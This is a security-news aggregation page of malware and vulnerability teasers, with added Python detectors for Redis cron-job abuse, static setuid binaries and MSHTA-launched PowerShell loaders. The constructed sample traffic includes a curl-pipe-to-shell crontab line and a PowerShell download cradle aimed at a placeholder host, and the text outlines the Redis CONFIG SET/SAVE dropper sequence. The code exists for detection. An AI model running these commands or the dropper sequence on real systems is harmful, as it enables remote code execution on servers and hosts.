Tag: malicious
-
Malicious npm Package in Koishi Chatbots Steals Sensitive Data in Real Time
Socket’s Threat Research Team has uncovered a dangerous npm package named koishi-plugin-pinhaofa, masquerading as a spelling-autocorrect helper for Koishi chatbots. Marketed innocently, this plugin embeds an insidious data-exfiltration backdoor that scans every incoming message for an eight-character hexadecimal string, a common format for short Git commit hashes, truncated JWT tokens, API keys, or device IDs. Upon…
-
Go-Based Malware Deploys XMRig Miner on Linux Hosts via Redis Configuration Abuse
Cybersecurity researchers are calling attention to a new Linux cryptojacking campaign that’s targeting publicly accessible Redis servers. The malicious activity has been codenamed RedisRaider by Datadog Security Labs. “RedisRaider aggressively scans randomized portions of the IPv4 space and uses legitimate Redis configuration commands to execute malicious cron jobs on vulnerable systems,” First seen on thehackernews.com. Jump to…
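An added example, not Datadog’s code or a RedisRaider sample, showing the detection side of the technique the quote describes. The long-known Redis primitive is that an unauthenticated client issues ordinary commands: SET a key whose value is a crontab line, CONFIG SET dir to a cron directory, CONFIG SET dbfilename to a username, then SAVE, so the RDB dump is written where cron will read it. The minimal RESP parser, the detector and the sample traffic below are constructed for this page; the watch list of cron directories and the scoring rules are assumptions.

```python
"""Flag Redis command sequences that turn the RDB writer into a cron-job
dropper (CONFIG SET dir/dbfilename followed by SAVE). Example code for
this page, not Datadog's or any RedisRaider sample."""
import re
from typing import Iterator

# Assumed watch list of paths where an RDB dump becomes a crontab.
CRON_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/cron.hourly")
# Five schedule fields followed by a command, anywhere inside a value.
CRON_LINE = re.compile(r"(?m)^\s*(?:[\d*/,-]+\s+){5}\S")


def encode_resp(*args: str) -> bytes:
    """Serialise one command the way a client sends it (RESP2 array)."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(parts)


def parse_resp(stream: bytes) -> Iterator[list[str]]:
    """Yield each command in a client-to-server byte stream as a list of
    decoded arguments. Only arrays of bulk strings are handled, which is
    the form redis-cli and library clients emit."""
    pos = 0
    while pos < len(stream):
        if stream[pos:pos + 1] != b"*":
            raise ValueError(f"expected array at offset {pos}")
        end = stream.index(b"\r\n", pos)
        count = int(stream[pos + 1:end])
        pos = end + 2
        args = []
        for _ in range(count):
            if stream[pos:pos + 1] != b"$":
                raise ValueError(f"expected bulk string at offset {pos}")
            end = stream.index(b"\r\n", pos)
            length = int(stream[pos + 1:end])
            pos = end + 2
            args.append(stream[pos:pos + length].decode("utf-8", "replace"))
            pos += length + 2  # payload plus its trailing CRLF
        yield args


def detect_cron_abuse(stream: bytes) -> list[str]:
    """Return one finding per suspicious step; an empty list means clean."""
    findings = []
    dir_redirected = False
    for cmd in parse_resp(stream):
        name = cmd[0].upper()
        if name == "CONFIG" and len(cmd) >= 4 and cmd[1].upper() == "SET":
            key, value = cmd[2].lower(), cmd[3]
            if key == "dir" and value.startswith(CRON_DIRS):
                dir_redirected = True
                findings.append(f"CONFIG SET dir -> cron directory {value}")
            elif key == "dbfilename" and not value.endswith(".rdb"):
                findings.append(f"CONFIG SET dbfilename -> {value!r} (not an .rdb name)")
        elif name == "SET" and len(cmd) >= 3 and CRON_LINE.search(cmd[2]):
            findings.append(f"SET {cmd[1]} -> value contains a crontab line")
        elif name in ("SAVE", "BGSAVE") and dir_redirected:
            findings.append(f"{name} with dir redirected: RDB dump lands in cron directory")
    return findings


# Constructed sample traffic modelled on the technique, not captured data.
ATTACK_STREAM = b"".join([
    encode_resp("FLUSHALL"),
    encode_resp("SET", "x", "\n\n*/2 * * * * curl -fsSL http://example.invalid/x.sh | sh\n\n"),
    encode_resp("CONFIG", "SET", "dir", "/var/spool/cron/crontabs"),
    encode_resp("CONFIG", "SET", "dbfilename", "root"),
    encode_resp("SAVE"),
])
BENIGN_STREAM = b"".join([
    encode_resp("SET", "session:42", "user=alice"),
    encode_resp("GET", "session:42"),
    encode_resp("CONFIG", "SET", "dir", "/var/lib/redis"),
    encode_resp("BGSAVE"),
])

if __name__ == "__main__":
    for line in detect_cron_abuse(ATTACK_STREAM):
        print("ALERT:", line)
    print("benign findings:", detect_cron_abuse(BENIGN_STREAM))
```

Feed it the client-to-server half of a capture from the Redis port, or run it inside a proxy. On the server side the standard redis.conf directives remove the primitive outright: `protected-mode yes`, `bind 127.0.0.1`, `requirepass`, and `rename-command CONFIG ""` so that an anonymous client cannot move the dump directory at all.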
-
Malicious PyPI Packages Exploit Instagram and TikTok APIs to Validate User Accounts
Cybersecurity researchers have uncovered malicious packages uploaded to the Python Package Index (PyPI) repository that act as checker tools to validate stolen email addresses against TikTok and Instagram APIs. All three packages are no longer available on PyPI. The packages were checker-SaGaF (2,605 downloads), steinlurks (1,049 downloads), and sinnercore (3,300 downloads). First seen on…
-
Malicious payloads embedded in Procolored printers
Tags: malicious. First seen on scworld.com. Jump to article: www.scworld.com/brief/malicious-payloads-embedded-in-procolored-printers
-
Malicious PyPI package sets sights on Russian developers
First seen on scworld.com. Jump to article: www.scworld.com/brief/malicious-pypi-package-sets-sights-on-russian-developers
-
Chinese APT Hackers Target Organizations Using Korplug Loaders and Malicious USB Drives
Advanced persistent threat (APT) groups with ties to China have become persistent players in the cyber espionage landscape, with a special emphasis on European governmental and industrial entities, according to a thorough disclosure from ESET’s APT Activity Report for Q4 2024 to Q1 2025. The report, covering activities from October 2024 to March 2025, highlights…
-
Hackers Exploit AutoIT Scripts to Deploy Malware Targeting Windows Systems
Cybersecurity researchers have unearthed a sophisticated attack leveraging AutoIT, a long-standing scripting language known for its deep integration with Windows operating systems. Often compared to .NET for its persistence in malicious campaigns, AutoIT’s simplicity and ability to interact with Windows components make it a favored tool among cybercriminals. This weekend, a particularly intricate malware delivery…
-
New Malware on PyPI Poses Threat to Open-Source Developers
Malicious dbgpkg package on PyPI poses as a debugging utility but acts as a delivery mechanism for a stealthy backdoor. First seen on infosecurity-magazine.com. Jump to article: www.infosecurity-magazine.com/news/malware-pypi-threat-open-source/
-
Skitnet Malware Employs Stealth Techniques to Execute Its Payload and Maintain Persistence
A new and highly sophisticated multi-stage malware, known as Skitnet (or Bossnet), has been uncovered, showcasing advanced stealth techniques to execute its malicious payload and maintain persistent access on infected systems. Developed by the threat group LARVA-306, Skitnet has been actively sold on underground forums like RAMP since April 19, 2024, with its creators offering…
-
A spoof antivirus makes Windows Defender disable security scans
Persistent API-level spoofing: While the Windows Security Center (WSC) is typically guarded by mechanisms like Protected Process Light (PPL) and signature validation, Defendnot sidesteps these barriers by injecting its code into Taskmgr.exe, a system-signed, trusted process. From there, it registers the ghost antivirus entry under a spoofed name, and Defender stands down as it does whenever a third-party product claims responsibility. One check worth running is to compare the AntiVirusProduct instances in the root/SecurityCenter2 WMI namespace against the products actually installed. Additionally, to ensure it sticks around, Defendnot sets up persistence via Windows Task…
-
Malicious RVTools installer found on official site, researcher warns
Tags: malicious. The official site for RVTools has apparently been hacked to serve a compromised installer for the popular utility, a security researcher has warned. It’s difficult to … First seen on helpnetsecurity.com. Jump to article: www.helpnetsecurity.com/2025/05/19/rvtools-installer-malware/
-
New ModiLoader Malware Campaign Targets Windows PCs, Harvesting User Credentials
AhnLab Security Intelligence Center (ASEC) has recently uncovered a malicious campaign distributing ModiLoader (also known as DBatLoader) malware through phishing emails. These emails, crafted in Turkish and impersonating a Turkish bank, urge recipients to open a malicious attachment under the guise of checking their transaction history. Inside the compressed RAR file lies a BAT script…
-
Critical Firefox 0-Day Flaws Allow Remote Code Execution
Mozilla has urgently patched two critical 0-day vulnerabilities in its popular web browser Firefox, both of which could allow remote attackers to execute malicious code on user systems. The flaws, tracked as CVE-2025-4918 and CVE-2025-4919, were disclosed on May 17, 2025, and are addressed in Firefox version 138.0.4. Security experts are strongly advising all users…
-
Thousands of WordPress Sites at Risk Due to Critical Crawlomatic Plugin Vulnerability
A severe security vulnerability has been discovered in the popular WordPress plugin, Crawlomatic Multisite Scraper Post Generator, potentially placing thousands of websites at risk. Tracked as CVE-2025-4389, the flaw allows unauthenticated attackers to upload malicious files, which could ultimately lead to remote code execution on affected websites. First seen on thecyberexpress.com. Jump to article: thecyberexpress.com/crawlomatic-plugin-hit-by-cve-2025-4389/
-
GNU C Library (glibc) Vulnerability Lets Attackers Execute Arbitrary Code on Millions of Linux Systems
Security researchers have disclosed a significant vulnerability in the GNU C Library (glibc), potentially affecting millions of Linux systems worldwide. The flaw, identified as CVE-2025-4802, involves statically linked setuid binaries that honour library search paths they should ignore when running with elevated privileges, which could let an attacker execute malicious code with those privileges. While no exploitation has been reported in the wild, the…
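As an added example (not glibc project code or anything from the advisory), an audit that inventories the population the flaw concerns: setuid or setgid executables that are statically linked, recognised by the absence of PT_INTERP and PT_DYNAMIC entries in the ELF program header table. The scratch-tree demo writes constructed ELF headers that are not loadable binaries; the file names and modes there are arbitrary.

```python
"""Inventory setuid/setgid executables that are statically linked, the
population exposed by a static-dlopen library-path bug. Example code for
this page, not from the glibc project or the advisory."""
import os
import stat
import struct
import tempfile

PT_DYNAMIC = 2
PT_INTERP = 3


def is_static_elf(data: bytes):
    """True if `data` is an ELF image with no PT_INTERP/PT_DYNAMIC segment
    (statically linked), False if dynamically linked, None if not ELF."""
    if data[:4] != b"\x7fELF" or len(data) < 64:
        return None
    endian = "<" if data[5] == 1 else ">"
    if data[4] == 2:  # ELFCLASS64
        (e_phoff,) = struct.unpack_from(endian + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 54)
    elif data[4] == 1:  # ELFCLASS32
        (e_phoff,) = struct.unpack_from(endian + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 42)
    else:
        return None
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 4 > len(data):
            return None  # truncated program header table
        (p_type,) = struct.unpack_from(endian + "I", data, off)
        if p_type in (PT_INTERP, PT_DYNAMIC):
            return False
    return True


def find_static_setuid(root: str) -> list[str]:
    """Walk `root`; return regular files carrying the setuid or setgid bit
    that are statically linked ELF images."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            try:
                with open(path, "rb") as fh:
                    image = fh.read()  # setuid helpers are small
            except OSError:
                continue
            if is_static_elf(image):
                hits.append(path)
    return sorted(hits)


def fake_elf64(p_types: list[int]) -> bytes:
    """Minimal little-endian ELF64 image whose program header table holds
    the given segment types. Constructed for testing; not runnable code."""
    ehdr = bytearray(64)
    ehdr[0:4] = b"\x7fELF"
    ehdr[4], ehdr[5] = 2, 1  # 64-bit, little-endian
    struct.pack_into("<Q", ehdr, 32, 64)  # e_phoff: table follows header
    struct.pack_into("<HH", ehdr, 54, 56, len(p_types))  # e_phentsize, e_phnum
    phdrs = b"".join(struct.pack("<I", t) + bytes(52) for t in p_types)
    return bytes(ehdr) + phdrs


def demo_in_tempdir() -> list[str]:
    """Populate a scratch tree with constructed files, run the finder and
    return the base names it flags."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "static-suid": (fake_elf64([1]), 0o4755),         # flagged
            "dynamic-suid": (fake_elf64([1, 3, 2]), 0o4755),  # has PT_INTERP
            "static-plain": (fake_elf64([1]), 0o755),         # no setuid bit
            "script-suid": (b"#!/bin/sh\nexit 0\n", 0o4755),  # not ELF
        }
        for name, (blob, mode) in samples.items():
            path = os.path.join(root, name)
            with open(path, "wb") as fh:
                fh.write(blob)
            os.chmod(path, mode)
        return [os.path.basename(p) for p in find_static_setuid(root)]


if __name__ == "__main__":
    print("scratch run:", demo_in_tempdir())
    # Real audit, needs read access to the binaries:
    # for p in find_static_setuid("/usr"): print(p)
```

Point find_static_setuid at /usr or / on a host; whatever it returns is where the glibc update (or relinking the binary dynamically) matters most, since a dynamically linked setuid binary is already handled by the loader’s secure-execution rules.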
-
Former U.S. Govt Employees Targeted by Chinese Intelligence
Report Uncovered Malicious Fake Job Network Operated by a Chinese Company. Recently laid off U.S. federal government officials are being targeted by Chinese intelligence through a network of front companies purporting to offer consulting work. Reports that foreign adversaries intended to recruit former officials began as soon as the administration’s intentions became apparent. First seen…
-
New Ransomware Attack Targets Elon Musk Supporters Using PowerShell to Deploy Payloads
A newly identified ransomware campaign has emerged, seemingly targeting supporters of Elon Musk through a highly sophisticated phishing-based attack. Cybersecurity researchers have uncovered a multi-stage infection chain that begins with a deceptive PDF document titled “Pay Adjustment.” This document lures victims into downloading a malicious ZIP file hosted on Netlify, a popular web hosting platform.…
-
Printer Company Distributes Malicious Drivers Infected with XRed Malware
Procolored, a printer manufacturing company, has been found distributing software drivers infected with malicious code, including the notorious XRed backdoor malware. The issue came to light when Cameron Coward, a YouTuber behind the channel Serial Hobbyism, attempted to review a $6,000 UV printer and encountered antivirus alerts upon plugging in a USB drive containing the…
-
FBI Alerts Public to Malicious Campaign Impersonating US Government Officials
The Federal Bureau of Investigation has issued a warning about an ongoing malicious messaging campaign targeting current and former senior US government officials and their contacts. Since April 2025, threat actors have been impersonating high-ranking US officials through text messages and AI-generated voice calls in an effort to gain access to personal accounts and potentially sensitive…
-
Frigidstealer Malware Targets macOS Users to Harvest Login Credentials
For macOS users, a new information-stealing malware dubbed FrigidStealer has emerged as a formidable threat since January 2025. This insidious malware capitalizes on user trust by masquerading as routine browser updates, luring unsuspecting individuals into downloading a malicious disk image file (DMG) from compromised websites. Unlike conventional malware, FrigidStealer bypasses macOS Gatekeeper protections by coercing…
-
APT Group 123 Targets Windows Systems in Ongoing Malicious Payload Campaign
Group123, a North Korean state-sponsored Advanced Persistent Threat (APT) group also known by aliases such as APT37, Reaper, and ScarCruft, continues to target Windows-based systems across multiple regions. Active since at least 2012, the group has historically focused on South Korea but has broadened its operations since 2017 to include Japan, Vietnam, the Middle East,…
-
Russian Espionage Operation Targets Organizations Linked to Ukraine War
In Operation RoundPress, the compromise vector is a spearphishing email leveraging an XSS vulnerability to inject malicious JavaScript code into the victim’s webmail page. First seen on infosecurity-magazine.com. Jump to article: www.infosecurity-magazine.com/news/fancy-bear-russia-cyber-espionage/
-
Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks
Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT. “Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents,” Qualys security researcher Akshay Thorve said in a technical report. “The attack chain leverages…
-
Hackers Leveraging PowerShell to Bypass Antivirus and EDR Defenses
Cybersecurity researchers have uncovered a growing trend in which threat actors are exploiting Microsoft PowerShell, a legitimate Windows shell and scripting language, to bypass advanced antivirus and Endpoint Detection and Response (EDR) defenses. This technique, often termed “Living off the Land” (LotL), allows attackers to leverage built-in system utilities, reducing their reliance on external malicious payloads…
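An added example that serves both the Remcos item above (LNK in a ZIP launching MSHTA, which in turn launches a PowerShell loader) and this LotL item. It scores PowerShell process-creation events, with the fields a Sysmon Event ID 1 record carries (pid, parent pid, image path, command line), on three signals: a script-host parent such as mshta.exe, stealth flags on the command line, and in-memory loader or download-cradle tokens. The events, the regexes, the weights and the threshold are all constructed or assumed for this page; none of it is Qualys telemetry or detection content.

```python
"""Score PowerShell process-creation events for the LNK/MSHTA -> PowerShell
chain and the usual living-off-the-land stealth flags. Example code for this
page; the events below are constructed, not vendor telemetry."""
import re
from dataclasses import dataclass, field

# Windows-native launchers that should rarely be PowerShell's parent (assumed list).
LOLBIN_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
STEALTH_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:enc(?:odedcommand)?|e|nop|noprofile|w(?:indowstyle)?\s+hidden|"
    r"ep\s+bypass|executionpolicy\s+bypass)\b")
INMEM_LOADER = re.compile(
    r"(?i)FromBase64String|VirtualAlloc|Marshal\]::Copy|Invoke-Expression|\bIEX\b|DownloadString")
THRESHOLD = 2  # assumed: a single weak signal such as -NoProfile is not enough


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    chain: str
    score: int
    reasons: list = field(default_factory=list)


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: dict, pid: int, limit: int = 8) -> list:
    """Image names from the process up to the oldest ancestor we hold an event for."""
    chain = []
    while pid in by_pid and len(chain) < limit:
        ev = by_pid[pid]
        chain.append(basename(ev.image))
        pid = ev.ppid
    return chain


def triage(events: list) -> list:
    """Return a Finding for every PowerShell launch whose score reaches THRESHOLD."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
            continue
        chain = ancestry(by_pid, ev.pid)
        parent = chain[1] if len(chain) > 1 else None
        score, reasons = 0, []
        if parent in LOLBIN_PARENTS:
            score += 2
            reasons.append(f"spawned by {parent}")
        if STEALTH_FLAGS.search(ev.cmdline):
            score += 1
            reasons.append("hidden/encoded/no-profile flags")
        if INMEM_LOADER.search(ev.cmdline):
            score += 2
            reasons.append("in-memory loader or download cradle on command line")
        if score >= THRESHOLD:
            findings.append(Finding(ev.pid, " <- ".join(chain), score, reasons))
    return findings


# Constructed events: a benign desktop, one MSHTA-launched loader, one cradle.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\bob\AppData\Local\Temp\order.hta"'),
    ProcEvent(300, 200, PS, "powershell.exe -nop -w hidden -enc QQBCAEMA"),
    ProcEvent(400, 100, PS, r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent(500, 2, r"C:\Program Files\PowerShell\7\pwsh.exe",
              "pwsh.exe -NoProfile -Command Get-Process"),
    ProcEvent(600, 100, PS, "powershell.exe IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/a.ps1')"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"pid {f.pid} score {f.score}: {f.chain} :: {', '.join(f.reasons)}")
```

The parent-chain signal is what separates the Remcos-style delivery from ordinary admin scripting: a hidden, encoded PowerShell on its own scores low here, but the same command line under mshta.exe or wscript.exe is flagged. Pair this with Script Block Logging (Event ID 4104), which records the decoded script body the command-line regexes cannot see.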
-
Polymorphic phishing attacks flood inboxes
AI is transforming the phishing threat landscape at a pace many security teams are struggling to match, according to Cofense. In 2024, researchers tracked one malicious email … First seen on helpnetsecurity.com. Jump to article: www.helpnetsecurity.com/2025/05/16/polymorphic-phishing-attacks-cofense/
-
Hackers Exploit Google Services to Send Malicious Law Enforcement Requests
Tags: cyber, cybersecurity, exploit, google, hacker, infrastructure, law, malicious, phishing, service. Cybersecurity researchers have uncovered a sophisticated phishing campaign where malicious actors exploit Google services to dispatch fraudulent law enforcement requests. This audacious scheme leverages the trust associated with Google’s infrastructure, specifically Google Forms and Google Drive, to craft and distribute highly convincing requests that appear to originate from legitimate law enforcement entities. The primary objective…
-
Threat Actors Exploit Open Source Packages to Deploy Malware in Supply Chain Attacks
The Socket Threat Research Team has uncovered a surge in supply chain attacks where threat actors weaponize open source software libraries to deliver malicious payloads such as infostealers, remote shells, and cryptocurrency drainers. With modern development heavily reliant on ecosystems like npm, PyPI, Go Module, Maven Central, and RubyGems where 70-90% of codebases consist of…

